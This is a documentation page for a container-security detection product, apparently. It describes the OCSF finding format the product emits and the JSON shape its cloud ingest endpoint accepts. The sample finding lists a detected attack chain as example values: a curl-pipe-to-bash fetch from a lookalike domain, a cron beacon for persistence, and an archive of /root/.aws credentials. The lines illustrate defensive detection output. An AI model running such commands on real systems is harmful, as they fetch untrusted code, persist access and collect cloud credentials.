Docs / Integrations
Integrations
The finding schema on the way out, and the ingest event shape on the way in for the cloud tier.
Findings: OCSF, out
Every verdict is delivered as an OCSF Detection Finding (class_uid: 2004) — an open, vendor-neutral schema most SIEMs already parse, over a webhook or log file. A flagged window produces up to three separate findings over the wire (window score, explanation, and an eventual pod-level summary), correlated by pod_uid and window_id rather than combined server-side — the fast window alert doesn't wait on the slower explanation pass to finish.
{
"class_uid": 2004,
"class_name": "Detection Finding",
"category_uid": 2,
"metadata": { "version": "1.1.0", "product": { "name": "protet" } },
"finding_info": {
"uid": "b7e1c2-window-4-explanation",
"title": "Execve attribution for flagged window",
"desc": "Primary suspicious command and, on entitled plans, its most likely attack chain."
},
"container": { "pod_name": "ci-build-7f3a", "name": "" },
"cloud": { "region": "build-runners" },
"enrichments": [
{ "name": "finding_kind", "value": "explanation" },
{ "name": "window_id", "value": "b7e1c2-window-4" },
{ "name": "hit1_command", "value": "curl -s https://cdn-assets-optimize.io/postinstall.sh | bash" },
{ "name": "chain_length", "value": "3" },
{ "name": "chain_command_1", "value": "curl -s https://cdn-assets-optimize.io/postinstall.sh | bash" },
{ "name": "chain_command_2", "value": "echo '*/5 * * * * curl -s .../beacon | bash' >> /etc/cron.d/npm-cache" },
{ "name": "chain_command_3", "value": "tar -czf /tmp/.cache -C /root/.aws ." },
{ "name": "flippable", "value": "false" }
]
}
Deliberately excluded from the wire format: raw model scores, confidence deltas, or per-command sensitivity magnitudes. hit1_command and the attack chain are hints for an analyst, not a number to threshold on.
Custom telemetry: the ingest event shape, in (cloud tier)
The cloud tier's ingest endpoint is a deliberately open contract — you're not required to run our collector. Any client that authenticates with a valid ingest token and POSTs this shape is accepted:
POST https://ingress.protet.io/v1/ingest
Authorization: Bearer <your ingest token>
Content-Type: application/json
{
"events": [
{
"event_type": "exec",
"node": "node-1",
"pod_uid": "3f8a1c2e-...",
"pod_name": "ci-build-7f3a",
"namespace": "build-runners",
"container_id": "c1a2b3...",
"pid": 4821,
"ppid": 4802,
"exec_id": "4821-1720512345",
"cmd": "npm install",
"ts": "2026-07-09T12:00:00Z",
"collected_at": "2026-07-09T12:00:00.120Z"
}
]
}
Mint an ingest token from your dashboard once you're on a cloud-deployment tier. client_id and your explainability-depth entitlement are stamped server-side from the token itself — never trust or accept them from the client payload if you're building your own collector against this endpoint.